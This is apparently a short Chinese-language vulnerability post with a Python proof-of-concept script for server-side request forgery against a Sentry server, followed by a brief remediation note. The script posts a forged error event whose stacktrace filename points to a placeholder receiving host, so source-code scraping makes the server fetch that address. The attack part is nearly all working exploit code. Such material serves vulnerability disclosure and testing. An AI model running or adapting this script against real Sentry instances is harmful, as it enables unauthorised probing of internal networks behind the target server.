测试脚本:
import requests import re def sentry_ssrf(): s = "https://82fddcba63b6324d8a38de946d1bb468@sentry.xxx.com/12" #sentry地址 ssrfReceiveAddr = "https://vps.com/receive" #接收ssrf请求地址,可以是你的vps key = re.search('https://(.*)@', s) domain = re.search('@(.*)/', s) number = re.search('/(.*)', s[8:]) url = "https://" + domain.group(1) + "/api/" + number.group(1) + "/store/?sentry_key=" + key.group(1) + "&sentry_version=7" datas = {"extra":{"component":"redux/actions/index","action":"RegisterDeviceWeb","serialized":{"code":"INVALID_CREDENTIALS","details":[]}},"fingerprint":["3cbf661c7f723b0a5816c16968fd9493","Non-Error exception captured with keys: code, details, message"],"message":"Non-Error exception captured with keys: code, details, message","stacktrace":{"frames":[{"colno":218121,"filename":ssrfReceiveAddr,"function":"?","lineno":1}]},"exception":{"values":[{"value":"Custom Object","type":"Error"}]},"event_id":"d0513ec5a3544e05aef0d1c7c5b24bae","platform":"javascript","sdk":{"name":"sentry.javascript.browser","packages":[{"name":"npm:@sentry/browser","version":"4.6.4"}],"version":"4.6.4"},"release":"6225dd99","user":{"phash":"996a3f4661e02cb505ae0daf406555e9b914f9d43d635c52cfc7485046862a7f"},"breadcrumbs":[{"timestamp":1554226659.455,"category":"navigation","data":{"from":"/","to":"/login"}}]} headers = {'Content-type': 'application/json', 'Origin':'https://xxx.com/'} rsp = requests.post(url, json=datas, headers=headers)
print('[*] '+url+' : '+rsp.text)
修复方案:
在sentry的设置中关闭“scrap source code”
保证配置文件中的黑名单不为空:/sentry/conf/server.py